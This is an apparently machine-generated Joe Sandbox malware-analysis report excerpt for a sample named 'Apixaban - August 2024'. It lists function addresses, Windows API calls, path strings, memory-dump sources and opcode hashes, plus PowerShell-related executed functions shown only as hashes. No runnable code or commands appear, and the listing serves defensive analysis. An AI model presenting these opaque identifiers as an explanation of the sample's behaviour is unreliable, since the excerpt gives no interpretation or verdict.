                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4083868402
                                                • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405135
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,004037F4,75573420,0040361F,?), ref: 00403837
                                                • GlobalFree.KERNEL32(?), ref: 0040383E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4083868402
                                                • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-1876063424
                                                • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

                                                Executed Functions

                                                Function 078357C0 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f115950dc2eb3cf59fab30204ae7b238cbccabbf5d96086f7c1b6599a99766b0
                                                • Instruction ID: d22d6efaab763e28e47119fc3d6b30e4caf4d630592b1f9eaa69a03fb7cc2159
                                                • Opcode Fuzzy Hash: f115950dc2eb3cf59fab30204ae7b238cbccabbf5d96086f7c1b6599a99766b0
                                                • Instruction Fuzzy Hash: AA318070B00204ABE7049B68C854FAFB7A3AFC9755F14C058E9026F795CF769C428BD2
                                                Function 07832E10 Relevance: 1.4, Instructions: 1387COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc947cdb9a9258b66beed3d423b33806ddccc84f9d2163c9ec092d1822e8a1a5
                                                • Instruction ID: 1ade16cb92abf747acc6c391c62c62ef9a9514bae00531d19efc5dbcf4709543
                                                • Opcode Fuzzy Hash: fc947cdb9a9258b66beed3d423b33806ddccc84f9d2163c9ec092d1822e8a1a5
                                                • Instruction Fuzzy Hash: 7AC291B0B00204DFE724CFA8C454BAAB7B2AF95315F6481A9D905AF782CB76DD41CF91
                                                Function 07834360 Relevance: .9, Instructions: 868COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f83396feacea1739153b8687a6169e912c24bd0adf5064214cac2de7c6237320
                                                • Instruction ID: bd2e455502ba21cb718a64842affeb7708ab2e7f5000ad33c001f998418849c8
                                                • Opcode Fuzzy Hash: f83396feacea1739153b8687a6169e912c24bd0adf5064214cac2de7c6237320
                                                • Instruction Fuzzy Hash: 07726DB4B00215DFE714CF98C850BAABBB2AF89344F14C0A9D909AF751DB72DD81CB91
                                                Function 07834CCA Relevance: .8, Instructions: 772COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0cdf84a303ceb51709d54075c7f30502613787bbfe51d08bca94275d383c1fd
                                                • Instruction ID: 6a9d0e439aa4d3dc7cd088a62514a801356276238ca23e48066598ae6551570d
                                                • Opcode Fuzzy Hash: f0cdf84a303ceb51709d54075c7f30502613787bbfe51d08bca94275d383c1fd
                                                • Instruction Fuzzy Hash: 59625CB4A00204DFE714CF58C850FAABBB2BF89354F14C099D919AB791DB72ED81CB91
                                                Function 0783430B Relevance: .6, Instructions: 616COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 539f7ff92f84e2fd6c92d340484e0fe5313804d9b39daf8606fb3fff870e55c1
                                                • Instruction ID: 6574038f88890e97d20071e966c398439e4b1e8c40c222dd8aeb7e1ce14d81d1
                                                • Opcode Fuzzy Hash: 539f7ff92f84e2fd6c92d340484e0fe5313804d9b39daf8606fb3fff870e55c1
                                                • Instruction Fuzzy Hash: 41425BB4A00254DFE724CF58C840FAABBB2EF85344F15C099D919AB791DB72ED81CB91
                                                Function 0783CB6E Relevance: .6, Instructions: 571COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: facb55b037f406bd8e8025abc8a513f5ddbf86170d1e4db878153b556629a8ba
                                                • Instruction ID: 7d7d8bf4605bf19080ea43abf8e89c7f88c1bda2e81a5003c7a86b7d660daaf3
                                                • Opcode Fuzzy Hash: facb55b037f406bd8e8025abc8a513f5ddbf86170d1e4db878153b556629a8ba
                                                • Instruction Fuzzy Hash: 1B3207B4B003149FD714DF58C851FAAB7B2AF8A345F108099E909AF395DB72ED81CB91
                                                Function 07831040 Relevance: .6, Instructions: 562COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ad64fd46fac9d8885586afb0b50cc32da356d5ca17d4d451f64fe1bc628b2d3
                                                • Instruction ID: f9ac1c651a71a82ea809fcbefdbe3678c165b53ad6914fabce1b3cb04943cfe4
                                                • Opcode Fuzzy Hash: 5ad64fd46fac9d8885586afb0b50cc32da356d5ca17d4d451f64fe1bc628b2d3
                                                • Instruction Fuzzy Hash: 6F2290B0B002099FD714CF98C854BAABBB2AF96714F25C06AE905DF391DB75DC41CB92
                                                Function 0783C457 Relevance: .5, Instructions: 452COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb789d448037196bd34fa71624213c780aeba97d8728abc91e4e648ff54bb264
                                                • Instruction ID: cf3defe2a262591b182d193b89fc138c4cf7c1a7776473c7bb1c7aa90a4671da
                                                • Opcode Fuzzy Hash: eb789d448037196bd34fa71624213c780aeba97d8728abc91e4e648ff54bb264
                                                • Instruction Fuzzy Hash: 2F121AB0B003149FD714DF58C850FAABBB2AF89345F148099E909AF395DB72ED81CB91
                                                Function 07834DD3 Relevance: .4, Instructions: 436COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05b5f6bfe02e73def55ce19e10df960d49d3373dd631abcaf71be742e740ff28
                                                • Instruction ID: 6fdc0751d5de427555ba0c60d4d423effbadb151b19bd80eafadd5b17a3589f8
                                                • Opcode Fuzzy Hash: 05b5f6bfe02e73def55ce19e10df960d49d3373dd631abcaf71be742e740ff28
                                                • Instruction Fuzzy Hash: C9024DB4B00214DFE714CF58C840FAAB7B2EF89344F55C099E919AB791DB72ED818B91
                                                Function 0783CC56 Relevance: .4, Instructions: 417COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1af0a571e25f218c20ee6a681e3fecbebfb33ffadd96219a991d7e8b07a37b24
                                                • Instruction ID: a90a01292f202283ee098dd109627c5845f71a1fa534fd0685e8c51a41fce538
                                                • Opcode Fuzzy Hash: 1af0a571e25f218c20ee6a681e3fecbebfb33ffadd96219a991d7e8b07a37b24
                                                • Instruction Fuzzy Hash: D60217B4B003149FD714DF58C850FAAB7B2AF89745F108099E909AF395DB72ED81CB91
                                                Function 07835320 Relevance: .4, Instructions: 373COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c877a3010cca628a6b9fecb90f6f2b5d93f8c2e7a0ddac72b195c318e49ef607
                                                • Instruction ID: 388605998241ae90b56f7ac24c3e7b4310acd83c6e822c5a14e817b434a5a78d
                                                • Opcode Fuzzy Hash: c877a3010cca628a6b9fecb90f6f2b5d93f8c2e7a0ddac72b195c318e49ef607
                                                • Instruction Fuzzy Hash: C0E19DB0B002059FE714DFA8C850BAEBBB2AF89355F25C469D801AF795DB71DC41CB92
                                                Function 0783D08F Relevance: .3, Instructions: 331COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 484c7aeb5dcf0a9de3b15b8789d0db35e14a197c6f34afe19a4718524dfb3189
                                                • Instruction ID: 8189c5d553c2087f18f5e7fc325537d232e71c339976857847a08a79bc5d19e3
                                                • Opcode Fuzzy Hash: 484c7aeb5dcf0a9de3b15b8789d0db35e14a197c6f34afe19a4718524dfb3189
                                                • Instruction Fuzzy Hash: AAE12CB0B00218DFE714DF68C854FAAB7B2AF86345F508099D509AF785DB71AD81CFA1
                                                Function 07835302 Relevance: .3, Instructions: 311COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b191e445af957b48d962d2e2eeaf9ff6ecaa73751ee26bfd4458ed3d8ed7868
                                                • Instruction ID: b0cc144b103fe94358898f467ef2a1271d2e741cd78531cb368b6c790ca27318
                                                • Opcode Fuzzy Hash: 5b191e445af957b48d962d2e2eeaf9ff6ecaa73751ee26bfd4458ed3d8ed7868
                                                • Instruction Fuzzy Hash: AFC19DB0B003059FEB14CFA8C850BAEBBB2AF89355F15C059D805AF795DB75E841CB92
                                                Function 07830778 Relevance: .2, Instructions: 230COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 436798d96289930241ea57b3607e12c2ea7576486085cd8726087c2b25d9e6ce
                                                • Instruction ID: 07ad49b659d54ee261b7177b6a3e110ddbb9350f6ca13256b8f233fe12473e98
                                                • Opcode Fuzzy Hash: 436798d96289930241ea57b3607e12c2ea7576486085cd8726087c2b25d9e6ce
                                                • Instruction Fuzzy Hash: C17105B5B002199FDB149F6D98102BABBA3EFD5615F24807AC856DB341EB32C941CBE1
                                                Function 07830A80 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 081e6b9f79891d5e6bef4bfed15938fa4ca1cede307d0b386636f03674b48f6a
                                                • Instruction ID: 0cf6fe5c5ec7bc6b529565216749bb954c88502bde1383e9421a6a340e54a941
                                                • Opcode Fuzzy Hash: 081e6b9f79891d5e6bef4bfed15938fa4ca1cede307d0b386636f03674b48f6a
                                                • Instruction Fuzzy Hash: 94518C7170435A8FDB255BAD98007A7BBA7AFD6325F14C07BD549CB281DA31C841C3E1
                                                Function 07830DE8 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7255b0facfec813a4dc13b57e486ef2a39f351e1d633c8a317f35b7e0713c9be
                                                • Instruction ID: 3afd9b6fc4106dbf4201ac760efc686edad410b6ae12fa802c091b30f3c4312f
                                                • Opcode Fuzzy Hash: 7255b0facfec813a4dc13b57e486ef2a39f351e1d633c8a317f35b7e0713c9be
                                                • Instruction Fuzzy Hash: D72179B130031E9BD7245A6E8801B3B77ABAFD5714F24C52AE506CB381CE76C84093E0
                                                Function 07830DCE Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7eaeb51cb8a352f5ce01a7846f662201b0f5c93bb1d621ed37bfa543a020a
                                                • Instruction ID: d161bf690b0e15aa4036e181d4be9ea93767c72f2ef7ef67f298b0caf6d46f23
